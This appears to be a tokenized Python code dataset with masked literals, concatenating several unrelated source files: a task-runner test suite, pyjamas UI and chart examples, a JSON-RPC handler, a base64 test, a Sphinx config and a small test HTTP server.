kwargs <EOL> ) <EOL> if expect_mirroring : <EOL> eq_ ( output . write . call_args_list , list ( map ( call , fake_in ) ) ) <EOL> eq_ ( len ( output . flush . call_args_list ) , len ( fake_in ) ) <EOL> else : <EOL> eq_ ( output . write . call_args_list , [ ] ) <EOL> def when_pty_is_True_no_mirroring_occurs ( self ) : <EOL> self . _test_mirroring ( <EOL> pty = True , <EOL> expect_mirroring = False , <EOL> ) <EOL> def when_pty_is_False_we_write_in_stream_back_to_out_stream ( self ) : <EOL> self . _test_mirroring ( <EOL> pty = False , <EOL> in_pty = True , <EOL> expect_mirroring = True , <EOL> ) <EOL> def mirroring_is_skipped_when_our_input_is_not_a_tty ( self ) : <EOL> self . _test_mirroring ( <EOL> in_pty = False , <EOL> expect_mirroring = False , <EOL> ) <EOL> def mirroring_can_be_forced_on ( self ) : <EOL> self . _test_mirroring ( <EOL> pty = True , <EOL> echo_stdin = True , <EOL> expect_mirroring = True , <EOL> ) <EOL> def mirroring_can_be_forced_off ( self ) : <EOL> self . _test_mirroring ( <EOL> pty = False , <EOL> in_pty = True , <EOL> echo_stdin = False , <EOL> expect_mirroring = False , <EOL> ) <EOL> def mirroring_honors_configuration ( self ) : <EOL> self . _test_mirroring ( <EOL> pty = False , <EOL> in_pty = True , <EOL> settings = { '<STR_LIT>' : { '<STR_LIT>' : False } } , <EOL> expect_mirroring = False , <EOL> ) <EOL> class character_buffered_stdin : <EOL> @ skip_if_windows <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def setcbreak_called_on_tty_stdins ( self , mock_termios , mock_tty ) : <EOL> self . _run ( _ ) <EOL> mock_tty . setcbreak . assert_called_with ( sys . stdin ) <EOL> @ skip_if_windows <EOL> @ patch ( '<STR_LIT>' ) <EOL> def setcbreak_not_called_on_non_tty_stdins ( self , mock_tty ) : <EOL> self . _run ( _ , in_stream = StringIO ( ) ) <EOL> eq_ ( mock_tty . setcbreak . call_args_list , [ ] ) <EOL> @ skip_if_windows <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def tty_stdins_have_settings_restored_by_default ( <EOL> self , mock_termios , mock_tty <EOL> ) : <EOL> sentinel = [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT> ] <EOL> mock_termios . tcgetattr . return_value = sentinel <EOL> self . _run ( _ ) <EOL> mock_termios . tcsetattr . assert_called_once_with ( <EOL> sys . stdin , mock_termios . TCSADRAIN , sentinel <EOL> ) <EOL> @ skip_if_windows <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def tty_stdins_have_settings_restored_on_KeyboardInterrupt ( <EOL> self , mock_termios , mock_tty <EOL> ) : <EOL> sentinel = [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT> ] <EOL> mock_termios . tcgetattr . return_value = sentinel <EOL> try : <EOL> self . _run ( _ , klass = _KeyboardInterruptingRunner ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> mock_termios . tcsetattr . assert_called_once_with ( <EOL> sys . stdin , mock_termios . TCSADRAIN , sentinel <EOL> ) <EOL> class keyboard_interrupts_act_transparently : <EOL> def _run_with_mocked_interrupt ( self , klass ) : <EOL> runner = klass ( Context ( config = Config ( ) ) ) <EOL> runner . send_interrupt = Mock ( ) <EOL> try : <EOL> runner . run ( _ ) <EOL> except : <EOL> pass <EOL> return runner <EOL> def send_interrupt_called_on_KeyboardInterrupt ( self ) : <EOL> runner = self . _run_with_mocked_interrupt ( <EOL> _KeyboardInterruptingRunner <EOL> ) <EOL> assert runner . send_interrupt . called <EOL> def send_interrupt_not_called_for_other_exceptions ( self ) : <EOL> class _GenericExceptingRunner ( _Dummy ) : <EOL> def wait ( self ) : <EOL> raise Exception <EOL> runner = self . _run_with_mocked_interrupt ( _GenericExceptingRunner ) <EOL> assert not runner . send_interrupt . called <EOL> def KeyboardInterrupt_is_still_raised ( self ) : <EOL> raised = None <EOL> try : <EOL> self . _run ( _ , klass = _KeyboardInterruptingRunner ) <EOL> except KeyboardInterrupt as e : <EOL> raised = e <EOL> assert raised is not None <EOL> class _FastLocal ( Local ) : <EOL> input_sleep = <NUM_LIT:0> <EOL> class _KeyboardInterruptingFastLocal ( _FastLocal ) : <EOL> def wait ( self ) : <EOL> raise KeyboardInterrupt <EOL> class Local_ ( Spec ) : <EOL> def _run ( self , * args , ** kwargs ) : <EOL> return _run ( * args , ** dict ( kwargs , klass = _FastLocal ) ) <EOL> def _runner ( self , * args , ** kwargs ) : <EOL> return _runner ( * args , ** dict ( kwargs , klass = _FastLocal ) ) <EOL> class pty_and_pty_fallback : <EOL> @ mock_pty ( ) <EOL> def when_pty_True_we_use_pty_fork_and_os_exec ( self ) : <EOL> "<STR_LIT>" <EOL> self . _run ( _ , pty = True ) <EOL> @ mock_pty ( ) <EOL> def pty_is_set_to_controlling_terminal_size ( self ) : <EOL> self . _run ( _ , pty = True ) <EOL> def warning_only_fires_once ( self ) : <EOL> skip ( ) <EOL> @ mock_pty ( isatty = False ) <EOL> def can_be_overridden_by_kwarg ( self ) : <EOL> self . _run ( _ , pty = True , fallback = False ) <EOL> @ mock_pty ( isatty = False ) <EOL> def can_be_overridden_by_config ( self ) : <EOL> self . _runner ( run = { '<STR_LIT>' : False } ) . run ( _ , pty = True ) <EOL> @ trap <EOL> @ mock_subprocess ( isatty = False ) <EOL> def fallback_affects_result_pty_value ( self , * mocks ) : <EOL> eq_ ( self . _run ( _ , pty = True ) . pty , False ) <EOL> @ mock_pty ( isatty = False ) <EOL> def overridden_fallback_affects_result_pty_value ( self ) : <EOL> eq_ ( self . _run ( _ , pty = True , fallback = False ) . pty , True ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def replaced_stdin_objects_dont_explode ( self , mock_sys ) : <EOL> mock_sys . stdin = object ( ) <EOL> runner = Local ( Context ( ) ) <EOL> eq_ ( runner . should_use_pty ( pty = True , fallback = True ) , False ) <EOL> @ mock_pty ( trailing_error = OSError ( "<STR_LIT>" ) ) <EOL> def spurious_OSErrors_handled_gracefully ( self ) : <EOL> self . _run ( _ , pty = True ) <EOL> @ mock_pty ( trailing_error = OSError ( "<STR_LIT>" ) ) <EOL> def non_spurious_OSErrors_bubble_up ( self ) : <EOL> try : <EOL> self . _run ( _ , pty = True ) <EOL> except ThreadException as e : <EOL> e = e . exceptions [ <NUM_LIT:0> ] <EOL> eq_ ( e . type , OSError ) <EOL> eq_ ( str ( e . value ) , "<STR_LIT>" ) <EOL> class encoding : <EOL> @ mock_subprocess ( ) <EOL> def uses_locale_module_for_desired_encoding ( self ) : <EOL> with patch ( '<STR_LIT>' ) as codecs : <EOL> self . _run ( _ ) <EOL> local_encoding = locale . getpreferredencoding ( False ) <EOL> _expect_encoding ( codecs , local_encoding ) <EOL> class send_interrupt : <EOL> def _run ( self , pty ) : <EOL> runner = _KeyboardInterruptingFastLocal ( Context ( config = Config ( ) ) ) <EOL> try : <EOL> runner . run ( _ , pty = pty ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> return runner <EOL> @ mock_pty ( skip_asserts = True ) <EOL> def uses_os_kill_when_pty_True ( self ) : <EOL> with patch ( '<STR_LIT>' ) as kill : <EOL> runner = self . _run ( pty = True ) <EOL> kill . assert_called_once_with ( runner . pid , SIGINT ) <EOL> @ mock_subprocess ( ) <EOL> def uses_subprocess_send_signal_when_pty_False ( self ) : <EOL> runner = self . _run ( pty = False ) <EOL> expected = SIGTERM if WINDOWS else SIGINT <EOL> runner . process . send_signal . assert_called_once_with ( expected ) <EOL> class shell : <EOL> @ mock_pty ( insert_os = True ) <EOL> def defaults_to_bash_when_pty_True ( self , mock_os ) : <EOL> self . _run ( _ , pty = True ) <EOL> eq_ ( mock_os . execve . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> @ mock_subprocess ( insert_Popen = True ) <EOL> def defaults_to_bash_when_pty_False ( self , mock_Popen ) : <EOL> self . _run ( _ , pty = False ) <EOL> eq_ ( mock_Popen . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> @ mock_pty ( insert_os = True ) <EOL> def may_be_overridden_when_pty_True ( self , mock_os ) : <EOL> self . _run ( _ , pty = True , shell = '<STR_LIT>' ) <EOL> eq_ ( mock_os . execve . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> @ mock_subprocess ( insert_Popen = True ) <EOL> def may_be_overridden_when_pty_False ( self , mock_Popen ) : <EOL> self . _run ( _ , pty = False , shell = '<STR_LIT>' ) <EOL> eq_ ( mock_Popen . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> class env : <EOL> @ mock_subprocess ( insert_Popen = True ) <EOL> def uses_Popen_kwarg_for_pty_False ( self , mock_Popen ) : <EOL> self . _run ( _ , pty = False , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> expected = dict ( os . environ , FOO = '<STR_LIT>' ) <EOL> eq_ ( <EOL> mock_Popen . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> expected <EOL> ) <EOL> @ mock_pty ( insert_os = True ) <EOL> def uses_execve_for_pty_True ( self , mock_os ) : <EOL> type ( mock_os ) . environ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . _run ( _ , pty = True , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> expected = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> eq_ ( <EOL> mock_os . execve . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] , <EOL> expected <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import pyjd <EOL> from pyjamas . ui . RootPanel import RootPanel <EOL> from pyjamas . ui . Button import Button <EOL> from pyjamas . ui . HTML import HTML <EOL> from pyjamas . ui . Label import Label <EOL> from pyjamas import Window <EOL> import pygwt <EOL> from __pyjamas__ import doc <EOL> from pyjamas import DOM <EOL> from pyjamas . ui . CSS import StyleSheetCssFile <EOL> from pyjamas . ui . CSS import StyleSheetCssText <EOL> newcolours = """<STR_LIT>""" <EOL> morenewcolours = """<STR_LIT>""" <EOL> global sc <EOL> sc = None <EOL> def greet ( fred ) : <EOL> global sc <EOL> txt = fred . getText ( ) <EOL> if txt == "<STR_LIT>" : <EOL> sc = StyleSheetCssText ( newcolours ) <EOL> fred . setText ( "<STR_LIT>" ) <EOL> elif txt == "<STR_LIT>" : <EOL> sc . remove ( ) <EOL> fred . setText ( "<STR_LIT>" ) <EOL> elif txt == "<STR_LIT>" : <EOL> sc = StyleSheetCssText ( morenewcolours ) <EOL> fred . setText ( "<STR_LIT>" ) <EOL> elif txt != "<STR_LIT>" : <EOL> fred . setText ( "<STR_LIT>" ) <EOL> sc . remove ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pyjd . setup ( "<STR_LIT>" ) <EOL> b = Button ( "<STR_LIT>" , greet , StyleName = '<STR_LIT>' ) <EOL> h = HTML ( "<STR_LIT>" , StyleName = '<STR_LIT>' ) <EOL> l = Label ( "<STR_LIT>" , StyleName = '<STR_LIT>' ) <EOL> base = HTML ( "<STR_LIT>" % pygwt . getModuleBaseURL ( ) , <EOL> StyleName = '<STR_LIT>' ) <EOL> RootPanel ( ) . add ( b ) <EOL> RootPanel ( ) . add ( h ) <EOL> RootPanel ( ) . add ( l ) <EOL> RootPanel ( ) . add ( base ) <EOL> StyleSheetCssFile ( "<STR_LIT>" ) <EOL> pyjd . run ( ) </s>
<s> import math <EOL> from pyjamas . chart . GChart import GChart <EOL> from pyjamas . chart . HovertextChunk import formatAsHovertext <EOL> def log10 ( x ) : <EOL> return math . log ( x ) / math . log ( <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> class GChartExample04 ( GChart ) : <EOL> def __init__ ( self ) : <EOL> GChart . __init__ ( self , XChartSize = <NUM_LIT> , YChartSize = <NUM_LIT> ) <EOL> self . setChartTitle ( "<STR_LIT>" ) <EOL> self . addCurve ( ) <EOL> self . getCurve ( ) . getSymbol ( ) . setHovertextTemplate ( <EOL> formatAsHovertext ( "<STR_LIT>" ) ) <EOL> self . getCurve ( ) . setLegendLabel ( "<STR_LIT>" ) <EOL> self . getCurve ( ) . getSymbol ( ) . setBackgroundColor ( "<STR_LIT>" ) <EOL> self . getCurve ( ) . getSymbol ( ) . setBorderColor ( "<STR_LIT>" ) <EOL> self . getCurve ( ) . getSymbol ( ) . setWidth ( <NUM_LIT:9> ) <EOL> self . getCurve ( ) . getSymbol ( ) . setHeight ( <NUM_LIT:9> ) <EOL> for i in range ( - <NUM_LIT:2> , <NUM_LIT:4> ) : <EOL> self . getCurve ( ) . addPoint ( i , log10 ( math . pow ( <NUM_LIT:2> , i ) ) ) <EOL> self . getYAxis ( ) . setTickLabelFormat ( "<STR_LIT>" ) <EOL> self . getYAxis ( ) . addTick ( log10 ( <NUM_LIT:0.1> ) ) <EOL> x = <NUM_LIT:0.1> <EOL> while x < <NUM_LIT:10> : <EOL> for y in range ( <NUM_LIT:2> , <NUM_LIT:11> ) : <EOL> self . getYAxis ( ) . addTick ( log10 ( x * y ) ) <EOL> x *= <NUM_LIT:10> <EOL> self . getXAxis ( ) . setAxisLabel ( "<STR_LIT>" ) <EOL> self . getXAxis ( ) . setHasGridlines ( True ) <EOL> self . getXAxis ( ) . setTickCount ( <NUM_LIT:6> ) <EOL> self . getYAxis ( ) . setAxisLabel ( "<STR_LIT>" ) <EOL> self . getYAxis ( ) . setHasGridlines ( True ) </s>
<s> """<STR_LIT>""" <EOL> from threading import Event , Lock <EOL> from errors import * <EOL> try : <EOL> from json import JSONDecoder , JSONEncoder <EOL> except ImportError , e : <EOL> from simplejson import JSONDecoder , JSONEncoder <EOL> class JSONRPCEncoder ( JSONEncoder ) : <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , JSONRPCError ) : <EOL> return obj . __class__ . __name__ <EOL> else : <EOL> return JSONEncoder . default ( self , obj ) <EOL> class Timeout ( Exception ) : <EOL> pass <EOL> class ResponseEvent : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . __evt = Event ( ) <EOL> def waiting ( self ) : <EOL> return not self . __evt . isSet ( ) <EOL> def waitForResponse ( self , timeOut = None ) : <EOL> """<STR_LIT>""" <EOL> self . __evt . wait ( timeOut ) <EOL> if self . waiting ( ) : <EOL> raise Timeout ( ) <EOL> else : <EOL> if self . response [ "<STR_LIT:error>" ] : <EOL> raise Exception ( self . response [ "<STR_LIT:error>" ] ) <EOL> else : <EOL> return self . response [ "<STR_LIT:result>" ] <EOL> def handleResponse ( self , resp ) : <EOL> self . response = resp <EOL> self . __evt . set ( ) <EOL> class SimpleMessageHandler : <EOL> def __init__ ( self , DecoderClass = JSONDecoder , EncoderClass = JSONRPCEncoder , messageDelimiter = "<STR_LIT>" ) : <EOL> self . decoder = DecoderClass ( ) <EOL> self . encoder = EncoderClass ( ) <EOL> self . partialData = "<STR_LIT>" <EOL> self . respEvents = { } <EOL> self . respLock = Lock ( ) <EOL> self . messageDelimiter = messageDelimiter <EOL> def close ( self ) : <EOL> pass <EOL> def send ( self , data ) : <EOL> pass <EOL> def sendMessage ( self , msg ) : <EOL> self . send ( self . encoder . encode ( msg ) + self . messageDelimiter ) <EOL> def handlePartialData ( self , data ) : <EOL> data = self . partialData + data . replace ( "<STR_LIT:\r>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\n>" , "<STR_LIT>" ) <EOL> msgs = [ ] <EOL> while data != "<STR_LIT>" : <EOL> pos = data . find ( "<STR_LIT:{>" ) <EOL> if ( pos > - <NUM_LIT:1> ) : <EOL> data = data [ pos : ] <EOL> try : <EOL> ( obj , pos ) = self . decoder . raw_decode ( data ) <EOL> data = data [ pos : ] <EOL> msgs . append ( obj ) <EOL> except : <EOL> break <EOL> else : <EOL> break <EOL> self . partialData = data <EOL> self . handleMessages ( msgs ) <EOL> def sendNotify ( self , name , args ) : <EOL> """<STR_LIT>""" <EOL> self . sendMessage ( { "<STR_LIT>" : name , "<STR_LIT>" : args } ) <EOL> def sendRequest ( self , name , args ) : <EOL> """<STR_LIT>""" <EOL> ( respEvt , id ) = self . newResponseEvent ( ) <EOL> self . sendMessage ( { "<STR_LIT:id>" : id , "<STR_LIT>" : name , "<STR_LIT>" : args } ) <EOL> return respEvt <EOL> def sendResponse ( self , id , result , error ) : <EOL> """<STR_LIT>""" <EOL> self . sendMessage ( { "<STR_LIT:result>" : result , "<STR_LIT:error>" : error , "<STR_LIT:id>" : id } ) <EOL> def newResponseEvent ( self ) : <EOL> """<STR_LIT>""" <EOL> respEvt = ResponseEvent ( ) <EOL> self . respLock . acquire ( ) <EOL> eid = id ( respEvt ) <EOL> self . respEvents [ eid ] = respEvt <EOL> self . respLock . release ( ) <EOL> return ( respEvt , eid ) <EOL> def handleMessages ( self , msgs ) : <EOL> for msg in msgs : <EOL> if msg . has_key ( "<STR_LIT>" ) and msg . has_key ( "<STR_LIT>" ) : <EOL> if msg . has_key ( "<STR_LIT:id>" ) : <EOL> if msg [ "<STR_LIT:id>" ] : <EOL> self . handleRequest ( msg ) <EOL> else : <EOL> self . handleNotification ( msg ) <EOL> else : <EOL> self . handleNotification ( msg ) <EOL> elif msg . has_key ( "<STR_LIT:result>" ) and msg . has_key ( "<STR_LIT:error>" ) : <EOL> self . handleResponse ( msg ) <EOL> else : <EOL> self . sendResponse ( None , InvalidJSONMessage ( ) ) <EOL> self . close ( ) <EOL> def handleResponse ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> id = resp [ "<STR_LIT:id>" ] <EOL> evt = self . respEvents [ id ] <EOL> del ( self . respEvents [ id ] ) <EOL> evt . handleResponse ( resp ) <EOL> def handleRequest ( self , request ) : <EOL> pass <EOL> def handleNotification ( self , notification ) : <EOL> pass <EOL> import re <EOL> NameAllowedRegExp = re . compile ( "<STR_LIT>" ) <EOL> def nameAllowed ( name ) : <EOL> """<STR_LIT>""" <EOL> if NameAllowedRegExp . match ( name ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def getMethodByName ( obj , name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> obj = obj . _getMethodByName ( name ) <EOL> except : <EOL> names = name . split ( "<STR_LIT:.>" ) <EOL> for name in names : <EOL> if nameAllowed ( name ) : <EOL> obj = getattr ( obj , name ) <EOL> else : <EOL> raise MethodNameNotAllowed ( ) <EOL> return obj <EOL> class SimpleServiceHandler ( SimpleMessageHandler ) : <EOL> def __init__ ( self , service , DecoderClass = JSONDecoder , EncoderClass = JSONRPCEncoder , messageDelimiter = "<STR_LIT>" ) : <EOL> self . service = service <EOL> SimpleMessageHandler . __init__ ( self , DecoderClass , EncoderClass , messageDelimiter ) <EOL> try : <EOL> service . _newConnection ( self ) <EOL> except : <EOL> pass <EOL> def close ( self ) : <EOL> try : <EOL> self . service . _closingConnection ( self ) <EOL> except : <EOL> pass <EOL> def handleRequest ( self , req ) : <EOL> """<STR_LIT>""" <EOL> name = req [ "<STR_LIT>" ] <EOL> params = req [ "<STR_LIT>" ] <EOL> id = req [ "<STR_LIT:id>" ] <EOL> obj = None <EOL> try : <EOL> obj = getMethodByName ( self . service , name ) <EOL> except MethodNameNotAllowed , e : <EOL> self . sendResponse ( id , None , e ) <EOL> except : <EOL> self . sendResponse ( id , None , MethodNotFound ( ) ) <EOL> if obj : <EOL> try : <EOL> rslt = obj ( * params ) <EOL> self . sendResponse ( id , rslt , None ) <EOL> except TypeError : <EOL> s = getTracebackStr ( ) <EOL> self . sendResponse ( id , None , InvalidMethodParameters ( ) ) <EOL> except : <EOL> s = getTracebackStr ( ) <EOL> self . sendResponse ( id , None , s ) <EOL> def handleNotification ( self , req ) : <EOL> """<STR_LIT>""" <EOL> name = req [ "<STR_LIT>" ] <EOL> params = req [ "<STR_LIT>" ] <EOL> try : <EOL> obj = getMethodByName ( self . service , name ) <EOL> rslt = obj ( * params ) <EOL> except : <EOL> pass </s>
<s> import sys <EOL> import UnitTest <EOL> import base64 <EOL> class Base64ModuleTest ( UnitTest . UnitTest ) : <EOL> def testBase64 ( self ) : <EOL> text = "<STR_LIT>" <EOL> encodetext = base64 . encodestring ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . decodestring ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> encodetext = base64 . b64encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . b64decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> encodetext = base64 . standard_b64encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . standard_b64decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> encodetext = base64 . urlsafe_b64encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . urlsafe_b64decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> def testBase32 ( self ) : <EOL> text = "<STR_LIT>" <EOL> encodetext = base64 . b32encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . b32decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) <EOL> def testBase16 ( self ) : <EOL> text = "<STR_LIT>" <EOL> encodetext = base64 . b16encode ( text ) <EOL> self . assertEqual ( encodetext , '<STR_LIT>' ) <EOL> decodetext = base64 . b16decode ( encodetext ) <EOL> self . assertEqual ( decodetext , text ) </s>
<s> value = <NUM_LIT:1> <EOL> def get_value ( ) : <EOL> return value </s>
<s> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> intersphinx_mapping = { '<STR_LIT>' : None } </s>
<s> from BaseHTTPServer import HTTPServer , BaseHTTPRequestHandler <EOL> from SocketServer import ThreadingMixIn , ForkingMixIn <EOL> import sys <EOL> import os <EOL> import cgi <EOL> import mimetypes <EOL> import shutil <EOL> import urlparse <EOL> import posixpath <EOL> import urllib <EOL> class Server : <EOL> def __init__ ( self ) : <EOL> server_address = ( '<STR_LIT>' , <NUM_LIT> ) <EOL> httpd = TestHTTPServer ( server_address , TestRequestHandler ) <EOL> httpd . serve_forever ( ) <EOL> class TestHTTPServer ( ThreadingMixIn , HTTPServer ) : <EOL> pass <EOL> class TestRequestHandler ( BaseHTTPRequestHandler ) : <EOL> def __init__ ( self , request , client_address , server ) : <EOL> BaseHTTPRequestHandler . __init__ ( self , request , client_address , server ) <EOL> self . protocol_version = '<STR_LIT>' <EOL> def do_GET ( self ) : <EOL> self . handle_data ( ) <EOL> def do_POST ( self ) : <EOL> self . form = cgi . FieldStorage ( <EOL> fp = self . rfile , <EOL> headers = self . headers , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : self . headers [ '<STR_LIT:Content-Type>' ] , <EOL> } , <EOL> keep_blank_values = True , <EOL> strict_parsing = False ) <EOL> self . handle_data ( ) <EOL> def handle_data ( self ) : <EOL> if self . path == '<STR_LIT:/>' : <EOL> p = '<STR_LIT>' <EOL> elif self . path . endswith ( '<STR_LIT>' ) : <EOL> self . handleUpload ( ) <EOL> return <EOL> else : <EOL> p = self . path <EOL> path = self . translate_path ( p ) <EOL> if not os . path . exists ( path ) : <EOL> p = '<STR_LIT>' + p <EOL> path = self . translate_path ( p ) <EOL> ctype = self . guess_type ( path ) <EOL> try : <EOL> f = open ( path ) <EOL> except IOError : <EOL> print '<STR_LIT>' % path <EOL> self . send_error ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return <EOL> self . send_response ( <NUM_LIT:200> ) <EOL> self . send_header ( '<STR_LIT>' , ctype ) <EOL> self . send_header ( '<STR_LIT>' , self . date_time_string ( ) ) <EOL> self . end_headers ( ) <EOL> self . copyfile ( f , self . wfile ) <EOL> f . close ( ) <EOL> def handleUpload ( self ) : <EOL> self . send_response ( <NUM_LIT:200> ) <EOL> self . end_headers ( ) <EOL> fileitem = self . form [ '<STR_LIT>' ] <EOL> filename = os . path . basename ( fileitem . filename ) <EOL> filepath = os . path . join ( os . getcwd ( ) , '<STR_LIT>' , filename ) <EOL> f = open ( filepath , '<STR_LIT:wb>' , <NUM_LIT> ) <EOL> def fbuffer ( f , chunk_size = <NUM_LIT> ) : <EOL> while True : <EOL> chunk = f . read ( chunk_size ) <EOL> if not chunk : break <EOL> yield chunk <EOL> for chunk in fbuffer ( fileitem . file ) : <EOL> f . write ( chunk ) <EOL> f . close ( ) <EOL> self . wfile . write ( '<STR_LIT>' ) <EOL> return <EOL> def translate_path ( self , path ) : <EOL> path = path . decode ( '<STR_LIT:utf-8>' ) <EOL> path = urlparse . urlparse ( path ) [ <NUM_LIT:2> ] <EOL> path = posixpath . normpath ( urllib . unquote ( path ) ) <EOL> words = path . split ( '<STR_LIT:/>' ) <EOL> words = filter ( None , words ) <EOL> path = os . getcwd ( ) <EOL> for word in words : <EOL> drive , word = os . path . splitdrive ( word ) <EOL> head , word = os . path . split ( word ) <EOL> if word in ( os . curdir , os . pardir ) : continue <EOL> path = os . path . join ( path , word ) <EOL> return path <EOL> def copyfile ( self , source , outputfile ) : <EOL> shutil . copyfileobj ( source , outputfile ) <EOL> def guess_type ( self , path ) : <EOL> base , ext = posixpath . splitext ( path ) <EOL> if ext in self . extensions_map : <EOL> return self . extensions_map [ ext ] <EOL> ext = ext . lower ( ) <EOL> if ext in self . extensions_map : <EOL> return self . extensions_map [ ext ] <EOL> else : <EOL> return self . extensions_map [ '<STR_LIT>' ] <EOL> if not mimetypes . inited : <EOL> mimetypes . init ( ) <EOL> extensions_map = mimetypes . types_map . copy ( ) <EOL> extensions_map . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> Server ( ) </s>
<s> """<STR_LIT>""" <EOL> from pyjamas . ui . RootPanel import RootPanel <EOL> from pyjamas . ui . DockPanel import DockPanel <EOL> from pyjamas . ui . HTML import HTML <EOL> from pyjamas . ui . SimplePanel import SimplePanel <EOL> from pyjamas . ui . VerticalPanel import VerticalPanel <EOL> from pyjamas . ui . Widget import Widget <EOL> from pyjamas import DOM <EOL> from pyjamas import Window <EOL> from __pyjamas__ import wnd <EOL> def indent ( contents , all = None , left = None , right = None , top = None , bottom = None , <EOL> hIndent = None , vIndent = None ) : <EOL> """<STR_LIT>""" <EOL> if all is not None : <EOL> left = all <EOL> right = all <EOL> top = all <EOL> bottom = all <EOL> if hIndent is not None : <EOL> left = hIndent <EOL> right = hIndent <EOL> if vIndent is not None : <EOL> top = vIndent <EOL> bottom = vIndent <EOL> wrapper = DockPanel ( ) <EOL> wrapper . setSpacing ( <NUM_LIT:0> ) <EOL> wrapper . add ( contents , DockPanel . CENTER ) <EOL> if left > <NUM_LIT:0> : <EOL> padding = Whitespace ( width = left ) <EOL> wrapper . add ( padding , DockPanel . WEST ) <EOL> if top > <NUM_LIT:0> : <EOL> padding = Whitespace ( height = top ) <EOL> wrapper . add ( padding , DockPanel . NORTH ) <EOL> if right > <NUM_LIT:0> : <EOL> padding = Whitespace ( width = right ) <EOL> wrapper . add ( padding , DockPanel . EAST ) <EOL> if bottom > <NUM_LIT:0> : <EOL> padding = Whitespace ( height = bottom ) <EOL> wrapper . add ( padding , DockPanel . SOUTH ) <EOL> return wrapper <EOL> def border ( contents ) : <EOL> """<STR_LIT>""" <EOL> wrapper = VerticalPanel ( ) <EOL> wrapper . add ( contents ) <EOL> wrapper . setBorderWidth ( <NUM_LIT:1> ) <EOL> return wrapper <EOL> def colour ( contents , colour ) : <EOL> """<STR_LIT>""" <EOL> wrapper = VerticalPanel ( ) <EOL> wrapper . add ( contents ) <EOL> DOM . setStyleAttribute ( wrapper . getElement ( ) , "<STR_LIT>" , colour ) <EOL> return wrapper <EOL> def prompt ( msg , defaultReply = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> return wnd ( ) . prompt ( msg , defaultReply ) ; <EOL> class Whitespace ( Widget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , width = <NUM_LIT:0> , height = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> Widget . __init__ ( self ) <EOL> self . setElement ( DOM . createElement ( '<STR_LIT>' ) ) <EOL> self . setPixelSize ( width , height ) <EOL> class PanelWithLabel ( SimplePanel ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , label , contents ) : <EOL> """<STR_LIT>""" <EOL> SimplePanel . __init__ ( self ) <EOL> label = HTML ( '<STR_LIT>' + label + '<STR_LIT>' ) <EOL> 